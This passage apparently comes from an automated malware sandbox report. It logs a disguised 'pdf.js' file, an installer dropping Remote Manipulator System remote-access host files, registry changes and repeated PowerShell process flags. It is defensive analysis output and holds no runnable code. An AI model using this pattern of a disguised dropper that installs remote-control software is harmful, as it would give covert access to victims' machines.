          Source: C:\Windows\System32\msiexec.exe | File created: C:\Program Files (x86)\Remote Manipulator System - Host\Printer\common\fwproc.exe
          Source: C:\Windows\System32\msiexec.exe | File created: C:\Program Files (x86)\Remote Manipulator System - Host\Printer\common\MessageBox.exe
          Source: C:\Windows\System32\msiexec.exe | File created: C:\Program Files (x86)\Remote Manipulator System - Host\libcodec32.dll
          Source: C:\Windows\System32\msiexec.exe | File created: C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\msvcp120.dll
          Source: C:\Windows\System32\msiexec.exe | File created: C:\Program Files (x86)\Remote Manipulator System - Host\webmvorbisdecoder.dll
          Source: C:\Windows\System32\msiexec.exe | File created: C:\Program Files (x86)\Remote Manipulator System - Host\vp8decoder.dll
          Source: C:\Windows\System32\msiexec.exe | File created: C:\Program Files (x86)\Remote Manipulator System - Host\eventmsg.dll
          Source: C:\Windows\System32\msiexec.exe | File created: C:\Program Files (x86)\Remote Manipulator System - Host\Printer\common\properties.exe
          Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\{65007958-166B-4F52-87F6-0C61CE20EB5C}\UNINST_Uninstall_R_3B1E3C8B7D0945898DA82CEEED02F0C7.exe
          Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\{65007958-166B-4F52-87F6-0C61CE20EB5C}\server_stop_27D7873393984316BEA10FB36BB4D2F9.exe
          Source: C:\Windows\System32\msiexec.exe | File created: C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\unidrvui_rppd.dll
          Source: C:\Windows\System32\msiexec.exe | File created: C:\Program Files (x86)\Remote Manipulator System - Host\Printer\common\vpdisp.exe
          Source: C:\Windows\System32\msiexec.exe | File created: C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\unires_vpd.dll
          Source: C:\Windows\System32\msiexec.exe | File created: C:\Program Files (x86)\Remote Manipulator System - Host\Printer\common\pdfout.dll
          Source: C:\Windows\System32\msiexec.exe | File created: C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\msvcp120.dll
          Source: C:\Windows\System32\msiexec.exe | File created: C:\Program Files (x86)\Remote Manipulator System - Host\Printer\common\srvinst.exe
          Source: C:\Windows\System32\msiexec.exe | File created: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe
          Source: C:\Windows\System32\msiexec.exe | File created: C:\Program Files (x86)\Remote Manipulator System - Host\vp8encoder.dll
          Source: C:\Windows\System32\msiexec.exe | File created: C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\rppdui.dll
          Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\{65007958-166B-4F52-87F6-0C61CE20EB5C}\server_start_C00864331B9D4391A8A26292A601EBE2.exe
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe | File created: C:\ProgramData\Remote Manipulator System\install.log
          Source: C:\Windows\System32\msiexec.exe | File created: C:\Program Files (x86)\Remote Manipulator System - Host\licenses.txt
          Source: C:\Windows\System32\msiexec.exe | File created: C:\Program Files (x86)\Remote Manipulator System - Host\EULA.rtf

          Hooking and other Techniques for Hiding and Protection

          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
          Source: Possible double extension: pdf.js | Static PE information: U0443.pdf.js
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe | Registry key monitored for changes: HKEY_USERS.DEFAULT\Software\Classes
          Source: C:\Windows\System32\msiexec.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SYSTEM\RMS Host Installer Security
          Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
